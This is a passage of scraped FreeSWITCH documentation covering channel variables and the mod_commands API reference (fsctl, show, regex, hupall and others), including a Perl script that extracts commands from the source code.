sip_auth_realm . variable_mailbox mailbox . variable_user_name user_name . variable_domain_name domain_name . variable_record_stereo record_stereo . variable_accountcode accountcode Accountcode for the call. This is an arbitrary value. It can be defined in the user variables in the directory, or it can be set/modified from dialplan. The accountcode may be used to force a specific CDR CSV template for the call. variable_user_context user_context . variable_effective_caller_id_name effective_caller_id_name . variable_effective_caller_id_number effective_caller_id_number . variable_caller_domain caller_domain . variable_sip_from_user sip_from_user . variable_sip_from_uri sip_from_uri . variable_sip_from_host sip_from_host . variable_sip_from_user_stripped sip_from_user_stripped . variable_sip_from_tag sip_from_tag . variable_sofia_profile_name sofia_profile_name . variable_sofia_profile_domain_name sofia_profile_domain_name . variable_sip_full_route sip_full_route The complete contents of the Route: header. variable_sip_full_via sip_full_via The complete contents of the Via: header. variable_sip_full_from sip_full_from The complete contents of the From: header. variable_sip_full_to sip_full_to The complete contents of the To: header. variable_sip_req_params sip_req_params . variable_sip_req_user sip_req_user . variable_sip_req_uri sip_req_uri . variable_sip_req_host sip_req_host . variable_sip_to_params sip_to_params . variable_sip_to_tag sip_to_tag . variable_sip_to_user sip_to_user . variable_sip_to_uri sip_to_uri . variable_sip_to_host sip_to_host . variable_sip_contact_params sip_contact_params . variable_sip_contact_user sip_contact_user . variable_sip_contact_port sip_contact_port . variable_sip_contact_uri sip_contact_uri . variable_sip_contact_host sip_contact_host . variable_sip_invite_domain sip_invite_domain . variable_channel_name channel_name . variable_sip_call_id sip_call_id SIP header Call-ID variable_sip_user_agent sip_user_agent . variable_sip_via_host sip_via_host . variable_sip_via_port sip_via_port . variable_sip_via_rport sip_via_rport . variable_presence_id presence_id . variable_sip_h_P-Key-Flags sip_h_p-key-flags This will contain the optional P-Key-Flags header(s) that may be received from calling endpoint. variable_switch_r_sdp switch_r_sdp The whole SDP received from calling endpoint. variable_remote_media_ip remote_media_ip . variable_remote_media_port remote_media_port . variable_write_codec write_codec . variable_write_rate write_rate . variable_endpoint_disposition endpoint_disposition . variable_dialed_ext dialed_ext . variable_transfer_ringback transfer_ringback . variable_call_timeout call_timeout . variable_hangup_after_bridge hangup_after_bridge . variable_continue_on_fail continue_on_fail . variable_dialed_user dialed_user . variable_dialed_domain dialed_domain . variable_sip_redirect_contact_user_0 sip_redirect_contact_user_0 . variable_sip_redirect_contact_host_0 sip_redirect_contact_host_0 . variable_sip_h_Referred-By sip_h_referred-by . variable_sip_refer_to sip_refer_to The full SIP URI received from a SIP Refer-To: response variable_max_forwards max_forwards . variable_originate_disposition originate_disposition . variable_read_codec read_codec . variable_read_rate read_rate . variable_open open . variable_use_profile use_profile . variable_current_application current_application . variable_ep_codec_string ep_codec_string This variable is only available if late negotiation is enabled on the profile. It\u0026rsquo;s a readable string containing all the codecs proposed by the calling endpoint. This can be easily parsed in the dialplan. variable_rtp_disable_hold rtp_disable_hold This variable when set will disable the hold feature of the phone. variable_sip_acl_authed_by sip_acl_authed_by This variable holds what ACL rule allowed the call. variable_curl_response_data curl_response_data This variable stores the output from the last curl made. variable_drop_dtmf drop_dtmf Set on a channel to drop DTMF events on the way out. variable_drop_dtmf_masking_file drop_dtmf_masking_file If drop_dtmf is true play specified file for every tone received. variable_drop_dtmf_masking_digits drop_dtmf_masking_digits If drop_dtmf is true play specified tone for every tone received. sip_codec_negotiation sip_codec_negotiation sip_codec_negotiation is basically a channel variable equivalent of inbound-codec-negotiation.sip_codec_negotiation accepts \u0026ldquo;scrooge\u0026rdquo; \u0026amp; \u0026ldquo;greedy\u0026rdquo; as values.This means you can change codec negotiation on a per call basis. Caller-Callee-ID-Name - - Caller-Callee-ID-Number - - Caller-Channel-Progress-Media-Time - - Caller-Channel-Progress-Time - - Caller-Direction - - Caller-Profile-Created-Time profile_created - Caller-Transfer-Source - - Channel-Call-State - - Channel-Call-UUID - - Channel-HIT-Dialplan - - Channel-Read-Codec-Bit-Rate - - Channel-Write-Codec-Bit-Rate - - Core-UUID - - Event-Calling-File - - Event-Calling-Function - - Event-Calling-Line-Number - - Event-Date-GMT - - Event-Date-Local - - Event-Date-Timestamp - - Event-Name - - Event-Sequence - - FreeSWITCH-Hostname - - FreeSWITCH-IPv4 - - FreeSWITCH-IPv6 - - FreeSWITCH-Switchname - - Hunt-ANI - - Hunt-Callee-ID-Name - - Hunt-Callee-ID-Number - - Hunt-Caller-ID-Name - - Hunt-Caller-ID-Number - - Hunt-Channel-Answered-Time - - Hunt-Channel-Created-Time - - Hunt-Channel-Hangup-Time - - Hunt-Channel-Name - - Hunt-Channel-Progress-Media-Time - - Hunt-Channel-Progress-Time - - Hunt-Channel-Transfer-Time - - Hunt-Context - - Hunt-Destination-Number - - Hunt-Dialplan - - Hunt-Direction - - Hunt-Network-Addr - - Hunt-Privacy-Hide-Name - - Hunt-Privacy-Hide-Number - - Hunt-Profile-Created-Time profile_created - Hunt-Profile-Index - - Hunt-RDNIS - - Hunt-Screen-Bit - - Hunt-Source - - Hunt-Transfer-Source - - Hunt-Unique-ID - - Hunt-Username - - Presence-Call-Direction - - variable_DIALSTATUS - - variable_absolute_codec_string - - variable_advertised_media_ip - - variable_answersec variable_answermsec variable_answerusec variable_billsec variable_billmsec variable_billusec variable_bridge_channel - - variable_bridge_hangup_cause - - variable_bridge_uuid - - variable_call_uuid - - variable_current_application_response - - variable_direction - - variable_duration variable_mduration variable_uduration variable_inherit_codec - - variable_is_outbound - - variable_last_bridge_to - - variable_last_sent_callee_id_name - - variable_last_sent_callee_id_number - - variable_local_media_ip - - variable_local_media_port - - variable_number_alias - - variable_originate_early_media - - variable_originating_leg_uuid - - variable_originator - - variable_originator_codec - - variable_outbound_caller_id_number - - variable_progresssec variable_progressmsec variable_progressusec variable_progress_mediasec variable_progress_mediamsec variable_progress_mediausec variable_recovery_profile_name - - variable_rtp_use_ssrc - - variable_session_id - - variable_sip_2833_recv_payload - - variable_sip_2833_send_payload - - variable_sip_P-Asserted-Identity - - variable_sip_Privacy - - variable_sip_audio_recv_pt - - variable_sip_cid_type - - variable_sip_cseq - - variable_sip_destination_url - - variable_sip_from_display sip_from_display \u0026lsquo;User\u0026rsquo; element of SIP From: line variable_sip_from_port - - variable_sip_gateway - - variable_sip_gateway_name - - variable_sip_h_P-Charging-Vector - - variable_sip_local_network_addr - - variable_sip_local_sdp_str - - variable_sip_network_ip - - variable_sip_network_port - - variable_sip_number_alias - - variable_sip_outgoing_contact_uri - - variable_sip_ph_P-Charging-Vector - - variable_sip_profile_name - - variable_sip_recover_contact - - variable_sip_recover_via - - variable_sip_reply_host - - variable_sip_reply_port - - variable_sip_req_port - - variable_sip_to_port - - variable_sip_use_codec_name - - variable_sip_use_codec_ptime - - variable_sip_use_codec_rate - - variable_sip_use_pt - - variable_sip_via_protocol - - variable_switch_m_sdp - - variable_transfer_history - - variable_transfer_source - - variable_uuid - - variable_waitsec variable_waitmsec variable_waitusec ","permalink":"https://wdd.js.org/freeswitch/channel-var-list/","summary":"About Channel variables are used to manipulate dialplan execution, to control call progress, and to provide options to applications. They play a pervasive role, as FreeSWITCH™ frequently consults channel variables as a way to customize processing prior to a channel\u0026rsquo;s creation, during call progress, and after the channel hangs up.  Click here to expand Table of Contents Variable Expansion We rely on variable expansion to create flexible, reusable dialplans:","title":"通道变量列表"},{"content":"\nUsage CLI See below. API/Event Interfaces mod_event_socket mod_erlang_event mod_xml_rpc Scripting Interfaces mod_perl mod_v8 mod_python mod_lua From the Dialplan An API command can be called from the dialplan. Example:Invoke API Command From DialplanOther examples:Other Dialplan API Command ExamplesAPI commands with multiple arguments usually have the arguments separated by a space:Multiple Arguments\nDialplan UsageIf you are calling an API command from the dialplan make absolutely certain that there isn\u0026rsquo;t already a dialplan application that gives you the functionality you are looking for. See mod_dptools for a list of dialplan applications, they are quite extensive. Extraction Script Mitch Capper wrote a Perl script to extract commands from mod_commands source code. It\u0026rsquo;s tailored specifically for extracting from mod_commands but should work for most other files.Extraction Perl Script#!/usr/bin/perluse strict;open (fl,\u0026ldquo;src/mod/applications/mod_commands/mod_commands.c\u0026rdquo;);my $cont;{ local $/ = undef; $cont = ;}close fl;my %DEFINES;my $reg_define = qr/[A-Za-z0-9_]+/;my $reg_function = qr/[A-Za-z0-9_]+/;my $reg_string_or_define = qr/(?:(?:$reg_define)|(?:\u0026quot;[^\u0026quot;]*\u0026quot;))/;\n#load defineswhile ($cont =~ / ^\\s* #define \\s+ ($reg_define) \\s+ \u0026quot;([^\u0026quot;]*)\u0026quot; /mgx){ warn \u0026ldquo;$1 is #defined multiple times\u0026rdquo; if ($DEFINES{$1}); $DEFINES{$1} = $2;}\nsub resolve_str_or_define($){ my ($str) = @_; if ($str =~ s/^\u0026quot;// \u0026amp;\u0026amp; $str =~ s/\u0026quot;$//){ #if starts and ends with a quote strip them off and return the str return $str; } warn \u0026ldquo;Unable to resolve define: $str\u0026rdquo; if (! $DEFINES{$str}); return $DEFINES{$str};}#parse commandswhile ($cont =~ / SWITCH_ADD_API \\s* ( ([^,]+) #interface $1 ,\\s* ($reg_string_or_define) # command $2 ,\\s* ($reg_string_or_define) # command description $3 ,\\s* ($reg_function) # function $4 ,\\s* ($reg_string_or_define) # usage $5 \\s*); /sgx){ my ($interface,$command,$descr,$function,$usage) = ($1,$2,$3,$4,$5); $command = resolve_str_or_define($command); $descr = resolve_str_or_define($descr); $usage = resolve_str_or_define($usage); warn \u0026ldquo;Found a not command interface of: $interface for command: $command\u0026rdquo; if ($interface ne \u0026ldquo;commands_api_interface\u0026rdquo;); print \u0026ldquo;$command \u0026ndash; $descr \u0026ndash; $usage\\n\u0026rdquo;;} Core Commands Implemented in http://fisheye.freeswitch.org/browse/freeswitch.git/src/mod/applications/mod_commands/mod_commands.cFormat of Returned DataResults of some status and listing commands are presented in comma delimited lists by default. Data returned from some modules may also contain commas, making it difficult to automate result processing. They may be able to be retrieved in an XML format by appending the string \u0026ldquo;as xml\u0026rdquo; to the end of the command string, or as json using \u0026ldquo;as json\u0026rdquo;, or change the delimiter from comma to something else using \u0026ldquo;as delim |\u0026rdquo;. acl Compare an ip to an Access Control ListUsage: acl \u0026lt;list_name\u0026gt; alias Alias: a means to save some keystrokes on commonly used commands.Usage: alias add | del [|*]Example:freeswitch\u0026gt; alias add reloadall reloadacl reloadxml+OKfreeswitch\u0026gt; alias add unreg sofia profile internal flush_inbound_reg+OKYou can add aliases that persist across restarts using the stickyadd argument:freeswitch\u0026gt; alias stickyadd reloadall reloadacl reloadxml+OKOnly really works from the console, not fs_cli. bgapi Execute an API command in a thread.Usage: bgapi [ ] complete Complete.Usage: complete add |del [|*] cond Evaluate a conditional expression.Usage: cond ? : Operators supported by are:\n== (equal to) != (not equal to) (greater than)\n= (greater than or equal to)\n\u0026lt; (less than) \u0026lt;= (less than or equal to) How are values compared?\ntwo strings are compared as strings two numbers are compared as numbers a string and a number are compared as strlen(string) and numbers For example, foo == 3 evaluates to true, and foo == three to false.\nExamples (click to expand)\nExample:Return true if first value is greater than the secondcond 5 \u0026gt; 3 ? true : falsetrueExample in dialplan:Slightly more complex example:\nNote about syntaxThe whitespace around the question mark and colon are required since FS-5945. Before that, they were optional. If the spaces are missing, the cond function will return -ERR. domain_exists Check if a FreeSWITCH domain exists.Usage: domain_exists eval Eval (noop). Evaluates a string, expands variables. Those variables that are set only during a call session require the uuid of the desired session or else return \u0026ldquo;-ERR no reply\u0026rdquo;.Usage: eval [uuid: ]Examples:eval ${domain}10.15.0.94eval Hello, World!Hello, World!eval uuid:e72aff5c-6838-49a8-98fb-84c90ad840d9 ${channel-state}CS_EXECUTE expand Execute an API command with variable expansion.Usage: expand [uuid: ] Example:expand originate sofia/internal/1001%${domain} 9999In this example the value of ${domain} is expanded. If the domain were, for example, \u0026ldquo;192.168.1.1\u0026rdquo; then this command would be executed:originate sofia/internal/1001%192.168.1.1 9999 fsctl Send control messages to FreeSWITCH.USAGE: fsctl [ api_expansion [on|off] | calibrate_clock | debug_level [level] | debug_sql | default_dtmf_duration [n] | flush_db_handles | hupall | last_sps | loglevel [level] | max_dtmf_duration [n] | max_sessions [n] | min_dtmf_duration [n] | min_idle_cpu [d] | pause [inbound|outbound] | pause_check [inbound|outbound] | ready_check | reclaim_mem | recover | resume [inbound|outbound] | save_history | send_sighup | shutdown [cancel|elegant|asap|now|restart] | shutdown_check | sps | sps_peak_reset | sql [start] | sync_clock | sync_clock_when_idle | threaded_system_exec | verbose_events [on|off] ]\nfsctl arguments api_expansion Usage: fsctl api_expansion [on|off]Toggles API expansion. With it off, no API functions can be expanded inside channel variables like ${show channels} This is a specific security mode that is not often used. calibrate_clock Usage: fsctl calibrate_clockRuns an algorithm to compute how long it actually must sleep in order to sleep for a true 1ms. It\u0026rsquo;s only useful in older kernels that don\u0026rsquo;t have timerfd. In those older kernels FS auto detects that it needs to do perform that computation. This command just repeats the calibration. **debug_level ** Usage: fsctl debug_level [level]Set the amount of debug information that will be posted to the log. 1 is less verbose while 9 is more verbose. Additional debug messages will be posted at the ALERT loglevel.0 - fatal errors, panic1 - critical errors, minimal progress at subsystem level2 - non-critical errors3 - warnings, progress messages5 - signaling protocol actions (incoming packets, \u0026hellip;)7 - media protocol actions (incoming packets, \u0026hellip;)9 - entering/exiting functions, very verbatim progress\ndebug_sql Usage: fsctl debug_sqlToggle core SQL debugging messages on or off each time this command is invoked. Use with caution on busy systems. In order to see all messages issue the \u0026ldquo;logelevel debug\u0026rdquo; command on the fs_cli interface. default_dtmf_duration Usage: fsctl default_dtmf_duration [int]int = number of clock ticksExample:fsctl default_dtmf_duration 2000This example sets the default_dtmf_duration switch parameter to 250ms. The number is specified in clock ticks (CT) where duration (milliseconds) = CT / 8 or CT = duration * 8The default_dtmf_duration specifies the DTMF duration to use on originated DTMF events or on events that are received without a duration specified. This value is bounded on the lower end by min_dtmf_duration and on the upper end by max_dtmf_duration. So max_dtmf_duration \u0026gt;= default_dtmf_duration \u0026gt;= min_dtmf_duration . This value can be set persistently in switch.conf.xmlTo check the current value:fsctl default_dtmf_duration 0FS recognizes a duration of 0 as a status check. Instead of setting the value to 0, it simply returns the current value. flush_db_handles Usage: fsctl flush_db_handlesFlushes cached database handles from the core db handlers. FreeSWITCH reuses db handles whenever possible, but a heavily loaded FS system can accumulate a large number of db handles during peak periods while FS continues to allocate new db handles to service new requests in a FIFO manner. \u0026ldquo;fsctl flush_db_handles\u0026rdquo; closes db connections that are no longer needed to avoid exceeding connections to the database server. hupall Usage: fsctl hupall \u0026lt;clearing_type\u0026gt; dialed_ext Disconnect existing calls to a destination and post a clearing cause.For example, to kill an active call with normal clearing and the destination being extension 1000:fsctl hupall normal_clearing dialed_ext 1000 last_sps Usage: fsctl last_spsQuery the actual sessions-per-second.fsctl last_sps+OK last sessions per second: 723987253(Your mileage might vary.) loglevel Usage: fsctl loglevel [level]Filter much detail the log messages will contain when displayed on the fs_cli interface. See mod_console for legal values of \u0026ldquo;level\u0026rdquo; and further discussion.The available loglevels can be specified by number or name:0 - CONSOLE1 - ALERT2 - CRIT3 - ERR4 - WARNING5 - NOTICE6 - INFO7 - DEBUG max_sessions Usage: fsctl max_sessions [int]Set how many simultaneous call sessions FS will allow. This value can be ascertained by load testing, but is affected by processor speed and quantity, network and disk bandwidth, choice of codecs, and other factors. See switch.conf.xml for the persistent setting max-sessions. max_dtmf_duration Usage: fsctl max_dtmf_duration [int]Default = 192000 clock ticksExample:fsctl max_dtmf_duration 80000This example sets the max_dtmf_duration switch parameter to 10,000ms (10 seconds). The integer is specified in clock ticks (CT) where CT / 8 = ms. The max_dtmf_duration caps the playout of a DTMF event at the specified duration. Events exceeding this duration will be truncated to this duration. You cannot configure a duration that exceeds this setting. This setting can be lowered, but cannot exceed 192000 (the default). This setting cannot be set lower than min_dtmf_duration. This setting can be set persistently in switch.conf.xml as max-dtmf-duration.To query the current value:fsctl max_dtmf_duration 0FreeSWITCH recognizes a duration of 0 as a status check. Instead of setting the value to 0, it simply returns the current value. min_dtmf_duration Usage: fsctl min_dtmf_duration [int]Default = 400 clock ticksExample:fsctl min_dtmf_duration 800This example sets the min_dtmf_duration switch parameter to 100ms. The integer is specified in clock ticks (CT) where CT / 8 = ms. The min_dtmf_duration specifies the minimum DTMF duration to use on outgoing events. Events shorter than this will be increased in duration to match min_dtmf_duration. You cannot configure a DTMF duration on a profile that is less than this setting. You may increase this value, but cannot set it lower than 400 (the default). This value cannot exceed max_dtmf_duration. This setting can be set persistently in switch.conf.xml as min-dtmf-duration.It is worth noting that many devices squelch in-band DTMF when sending RFC 2833. Devices that squelch in-band DTMF have a certain reaction time and clamping time which can sometimes reach as high as 40ms, though most can do it in less than 20ms. As the shortness of your DTMF event duration approaches this clamping threshold, the risk of your DTMF being ignored as a squelched event increases. If your call is always IP-IP the entire route, this is likely not a concern. However, when your call is sent to the PSTN, the RFC 2833 DTMF events must be encoded in the audio stream. This means that other devices down the line (possibly a PBX or IVR that you are calling) might not hear DTMF tones that are long enough to decode and so will ignore them entirely. For this reason, it is recommended that you do not send DTMF events shorter than 80ms.Checking the current value:fsctl min_dtmf_duration 0FreeSWITCH recognizes a duration of 0 as a status check. Instead of setting the value to 0, it simply returns the current value. min_idle_cpu Usage: fsctl min_idle_cpu [int]Allocates the minimum percentage of CPU idle time available to other processes to prevent FreeSWITCH from consuming all available CPU cycles.Example:fsctl min_idle_cpu 10This allocates a minimum of 10% CPU idle time which is not available for processing by FS. Once FS reaches 90% CPU consumption it will respond with cause code 503 to additional SIP requests until its own usage drops below 90%, while reserving that last 10% for other processes on the machine. pause Usage: fsctl pause [inbound|outbound]Pauses the ability to receive inbound or originate outbound calls, or both directions if the keyword is omitted. Executing fsctl pause inbound will also prevent registration requests from being processed. Executing fsctl pause outbound will result in the Critical log message \u0026ldquo;The system cannot create any outbound sessions at this time\u0026rdquo; in the FS log.Use resume with the corresponding argument to restore normal operation. pause_check Usage: fsctl pause_check [inbound|outbound]Returns true if the specified mode is active.Examples:fsctl pause_check inboundtrueindicates that inbound calls and registrations are paused. Use fsctl resume inbound to restore normal operation.fsctl pause_checktrueindicates that both inbound and outbound sessions are paused. Use fsctl resume to restore normal operation. ready_check Usage: fsctl ready_checkReturns true if the system is in the ready state, as opposed to awaiting an elegant shutdown or other not-ready state. reclaim_mem Usage: fsctl reclaim_mem recover Usage: fsctl recoverSends an endpoint–specific recover command to each channel detected as recoverable. This replaces “sofia recover” and makes it possible to have multiple endpoints besides SIP implement recovery. resume Usage: fsctl resume [inbound|outbound]Resumes normal operation after pausing inbound, outbound, or both directions of call processing by FreeSWITCH.Example:fsctl resume inbound+OKResumes processing of inbound calls and registrations. Note that this command always returns +OK, but the same keyword must be used that corresponds to the one used in the pause command in order to take effect. save_history Usage: fsctl save_historyWrite out the command history in anticipation of executing a configuration that might crash FS. This is useful when debugging a new module or script to allow other developers to see what commands were executed before the crash. send_sighup Usage: fsctl send_sighupDoes the same thing that killing the FS process with -HUP would do without having to use the UNIX kill command. Useful in environments like Windows where there is no kill command or in cron or other scripts by using fs_cli -x \u0026ldquo;fsctl send_sighup\u0026rdquo; where the FS user process might not have privileges to use the UNIX kill command. shutdown Usage: fsctl shutdown [asap|asap restart|cancel|elegant|now|restart|restart asap|restart elegant]\ncancel - discontinue a previous shutdown request. elegant - wait for all traffic to stop, while allowing new traffic. asap - wait for all traffic to stop, but deny new traffic. now - shutdown FreeSWITCH immediately. restart - restart FreeSWITCH immediately following the shutdown. When giving \u0026ldquo;elegant\u0026rdquo;, \u0026ldquo;asap\u0026rdquo; or \u0026ldquo;now\u0026rdquo; it\u0026rsquo;s also possible to add the restart command: shutdown_check Usage: fsctl shutdown_checkReturns true if FS is shutting down, or shutting down and restarting. sps Usage: fsctl sps [int]This changes the sessions-per-second limit from the value initially set in switch.conf sync_clock Usage: fsctl sync_clockFreeSWITCH will not trust the system time. It gets one sample of system time when it first starts and uses the monotonic clock after that moment. You can sync it back to the current value of the system\u0026rsquo;s real-time clock with fsctl sync_clockNote: fsctl sync_clock immediately takes effect, which can affect the times on your CDRs. You can end up underbilling/overbilling, or even calls hungup before they originated. e.g. if FS clock is off by 1 month, then your CDRs will show calls that lasted for 1 month!See fsctl sync_clock_when_idle which is much safer. sync_clock_when_idle Usage: fsctl sync_clock_when_idleSynchronize the FreeSWITCH clock to the host machine\u0026rsquo;s real-time clock, but wait until there are 0 channels in use. That way it doesn\u0026rsquo;t affect any CDRs. verbose_events Usage: fsctl verbose_events [on|off]Enables verbose events. Verbose events have every channel variable in every event for a particular channel. Non-verbose events have only the pre-selected channel variables in the event headers.See switch.conf.xml for the persistent setting of verbose-channel-events.\nglobal_getvar Gets the value of a global variable. If the parameter is not provided then it gets all the global variables.Usage: global_getvar [] global_setvar Sets the value of a global variable.Usage: global_setvar =Example:global_setvar outbound_caller_id=2024561000 group_call Returns the bridge string defined in a call group.Usage: group_call group@domain[+F|+A|+E]+F will return the group members in a serial fashion separated by | (the pipe character)+A (default) will return them in a parallel fashion separated by , (comma)+E will return them in a enterprise fashion separated by :_: (colon underscore colon).There is no space between the domain and the optional flag. See Groups in the XML User Directory for more information.Please note: If you need to have outgoing user variables set in leg B, make sure you don\u0026rsquo;t have dial-string and group-dial-string in your domain or dialed group variables list; instead set dial-string or group-dial-string in the default group of the user. This way group_call will return user/101 and user/ would set all your user variables to the leg B channel.The B leg receives a new variable, dialed_group, containing the full group name. help Show help for all the API commands.Usage: help host_lookup Performs a DNS lookup on a host name.Usage: host_lookup hupall Disconnect existing channels.Usage: hupall [ ]All channels with set to will be disconnected with code.Example:originate {foo=bar}sofia/internal/someone1@server.com,sofia/internal/someone2@server.com \u0026amp;parkhupall normal_clearing foo barTo hang up all calls on the switch indiscriminately:hupall system_shutdown in_group Determine if a user is a member of a group.Usage: in_group [@] \u0026lt;group_name\u0026gt; is_lan_addr See if an IP is a LAN address.Usage: is_lan_addr json JSON APIUsage: json {\u0026ldquo;command\u0026rdquo; : \u0026ldquo;\u0026hellip;\u0026rdquo;, \u0026ldquo;data\u0026rdquo; : \u0026ldquo;\u0026hellip;\u0026rdquo;}Example\u0026gt; json {\u0026ldquo;command\u0026rdquo; : \u0026ldquo;status\u0026rdquo;, \u0026ldquo;data\u0026rdquo; : \u0026ldquo;\u0026rdquo;} {\u0026ldquo;command\u0026rdquo;:\u0026ldquo;status\u0026rdquo;,\u0026ldquo;data\u0026rdquo;:\u0026quot;\u0026quot;,\u0026ldquo;status\u0026rdquo;:\u0026ldquo;success\u0026rdquo;,\u0026ldquo;response\u0026rdquo;:{\u0026ldquo;systemStatus\u0026rdquo;:\u0026ldquo;ready\u0026rdquo;,\u0026ldquo;uptime\u0026rdquo;:{\u0026ldquo;years\u0026rdquo;:0,\u0026ldquo;days\u0026rdquo;:20,\u0026ldquo;hours\u0026rdquo;:20,\u0026ldquo;minutes\u0026rdquo;:37,\u0026ldquo;seconds\u0026rdquo;:4,\u0026ldquo;milliseconds\u0026rdquo;:254,\u0026ldquo;microseconds\u0026rdquo;:44},\u0026ldquo;version\u0026rdquo;:\u0026ldquo;1.6.9 -16-d574870 64bit\u0026rdquo;,\u0026ldquo;sessions\u0026rdquo;:{\u0026ldquo;count\u0026rdquo;:{\u0026ldquo;total\u0026rdquo;:132,\u0026ldquo;active\u0026rdquo;:0,\u0026ldquo;peak\u0026rdquo;:2,\u0026ldquo;peak5Min\u0026rdquo;:0,\u0026ldquo;limit\u0026rdquo;:1000},\u0026ldquo;rate\u0026rdquo;:{\u0026ldquo;current\u0026rdquo;:0,\u0026ldquo;max\u0026rdquo;:30,\u0026ldquo;peak\u0026rdquo;:2,\u0026ldquo;peak5Min\u0026rdquo;:0}},\u0026ldquo;idleCPU\u0026rdquo;:{\u0026ldquo;used\u0026rdquo;:0,\u0026ldquo;allowed\u0026rdquo;:99.733333},\u0026ldquo;stackSizeKB\u0026rdquo;:{\u0026ldquo;current\u0026rdquo;:240,\u0026ldquo;max\u0026rdquo;:8192}}} load Load external moduleUsage: load \u0026lt;mod_name\u0026gt;Example:load mod_v8 md5 Return MD5 hash for the given input dataUsage: md5 hash-keyExample:md5 freeswitch-is-awesome765715d4f914bf8590d1142b6f64342e module_exists Check if module is loaded.Usage: module_exists Example:module_exists mod_event_sockettrue msleep Sleep for x number of millisecondsUsage: msleep nat_map Manage Network Address Translation mapping.Usage: nat_map [status|reinit|republish] | [add|del] [tcp|udp] [sticky] | [mapping] \u0026lt;enable|disable\u0026gt;\nstatus - Gives the NAT type, the external IP, and the currently mapped ports. reinit - Completely re-initializes the NAT engine. Use this if you have changed routes or have changed your home router from NAT mode to UPnP mode. republish - Causes FreeSWITCH to republish the NAT maps. This should not be necessary in normal operation. mapping - Controls whether port mapping requests will be sent to the NAT (the command line option of -nonatmap can set it to disable on startup). This gives the ability of still using NAT for getting the public IP without opening the ports in the NAT. Note: sticky makes the mapping stay across FreeSWITCH restarts. It gives you a permanent mapping.Warning: If you have multiple network interfaces with unique IP addresses defined in sip profiles using the same port, nat_map will get confused when it tries to map the same ports for multiple profiles. Set up a static mapping between the public address and port and the private address and port in the sip_profiles to avoid this problem. regex Evaluate a regex (regular expression).Usage: regex |[|][|(n|b)]regex m://[/][/(n|b)]regex m:~~[~][~(n|b)]This command behaves differently depending upon whether or not a substitution string and optional flag is supplied:\nIf a subst is not supplied, regex returns either \u0026ldquo;true\u0026rdquo; if the pattern finds a match or \u0026ldquo;false\u0026rdquo; if not. If a subst is supplied, regex returns the subst value on a true condition. If a subst is supplied, on a false (no pattern match) condition regex returns: the source string with no flag; with the n flag regex returns null which forces the response \u0026ldquo;-ERR no reply\u0026rdquo; from regex; with the b flag regex returns \u0026ldquo;false\u0026rdquo; The regex delimiter defaults to the | (pipe) character. The delimiter may be changed to ~ (tilde) or / (forward slash) by prefixing the regex with m:Examples:regex test1234|\\d \u0026lt;== Returns \u0026ldquo;true\u0026rdquo;regex m:/test1234/\\d \u0026lt;== Returns \u0026ldquo;true\u0026rdquo;regex m:~test1234~\\d \u0026lt;== Returns \u0026ldquo;true\u0026rdquo;regex test|\\d \u0026lt;== Returns \u0026ldquo;false\u0026rdquo;regex test1234|(\\d+)|$1 \u0026lt;== Returns \u0026ldquo;1234\u0026rdquo;regex sip:foo@bar.baz|^sip:(.*)|$1 \u0026lt;== Returns \u0026ldquo;foo@bar.baz\u0026rdquo;regex testingonetwo|(\\d+)|$1 \u0026lt;== Returns \u0026ldquo;testingonetwo\u0026rdquo; (no match)regex m:~30~/^(10|20|40)$/~$1 \u0026lt;== Returns \u0026ldquo;30\u0026rdquo; (no match)regex m:~30~/^(10|20|40)$/~$1~n \u0026lt;== Returns \u0026ldquo;-ERR no reply\u0026rdquo; (no match)regex m:~30~/^(10|20|40)$/~$1~b \u0026lt;== Returns \u0026ldquo;false\u0026rdquo; (no match)Logic in revision 14727 if the source string matches the result then the condition was false however there was a match and it is 1001.regex 1001|/(^\\d{4}$)/|$1\nSee also Regular_Expression reload Reload a module.Usage: reload \u0026lt;mod_name\u0026gt; reloadacl Reload Access Control Lists after modifying them in autoload_configs/acl.conf.xml and as defined in extensions in the user directory conf/directory/*.xmlUsage: reloadacl [reloadxml] reloadxml Reload conf/freeswitch.xml settings after modifying configuration files.Usage: reloadxml show Display various reports, VERY useful for troubleshooting and confirming proper configuration of FreeSWITCH. Arguments can not be abbreviated, they must be specified fully.Usage: show [ aliases | api | application | bridged_calls | calls [count] | channels [count|like ] | chat | codec | complete | detailed_bridged_calls | detailed_calls | dialplan | endpoint | file | interface_types | interfaces | limits management | modules | nat_map |registrations | say | tasks | timer | ] [as xml|as delim ]XML formatted:show foo as xmlChange delimiter:show foo as delim |\naliases – list defined command aliases api – list API commands exposed by loadable modules application – list applications exposed by loadable modules, notably mod_dptools bridged_calls – deprecated, use \u0026ldquo;show calls\u0026rdquo; calls [count] – list details of currently active calls; the keyword \u0026ldquo;count\u0026rdquo; eliminates the details and only prints the total count of calls channels [count|like ] – list current channels; see Channels vs Calls count – show only the count of active channels, no details like – filter results to include only channels that contain in uuid, channel name, cid_number, cid_name, presence data fields. chat – list chat interfaces codec – list codecs that are currently loaded in FreeSWITCH complete – list command argument completion tables detailed_bridged_calls – same as \u0026ldquo;show detailed_calls\u0026rdquo; detailed_calls – like \u0026ldquo;show calls\u0026rdquo; but with more fields dialplan – list dialplan interfaces endpoint – list endpoint interfaces currently available to FS file – list supported file format interfaces interface_types – list all interface types with a summary count of each type of interface available interfaces – enumerate all available interfaces by type, showing the module which exposes each interface limits – list database limit interfaces management – list management interfaces module – enumerate modules and the path to each nat_map – list Network Address Translation map registrations – enumerate user extension registrations say – enumerate available TTS (text-to-speech) interface modules with language supported tasks – list FS tasks timer – list timer modules Tips For Showing Calls and Channels The best way to get an understanding of all of the show calls/channels is to use them and observe the results. To display more fields:\nshow detailed_calls show bridged_calls show detailed_bridged_calls These three take the expand on information shown by \u0026ldquo;show calls\u0026rdquo;. Note that \u0026ldquo;show detailed_calls\u0026rdquo; replaces \u0026ldquo;show distinct_channels\u0026rdquo;. It provides similar, but more detailed, information. Also note that there is no \u0026ldquo;show detailed_channels\u0026rdquo; command, however using \u0026ldquo;show detailed_calls\u0026rdquo; will yield the same net result: FreeSWITCH lists detailed information about one-legged calls and bridged calls by using \u0026ldquo;show detailed_calls\u0026rdquo;, which can be quite useful while configuring and troubleshooting FS.Filtering ResultsTo filter only channels matching a specific uuid or related to a specific call, set the presence_data channel variable in the bridge or originate application to a unique string. Then you can use:show channels like footo list only those channels of interest. The like directive filters on these fields:\nuuid channel name caller id name caller id number presence_data NOTE: presence_data must be set during bridge or originate and not after the channel is established. shutdown Stop the FreeSWITCH program.Usage: shutdownThis only works from the console. To shutdown FS from an API call or fs_cli, you should use \u0026ldquo;fsctl shutdown\u0026rdquo; which offers a number of options.Shutdown from the console ignores arguments and 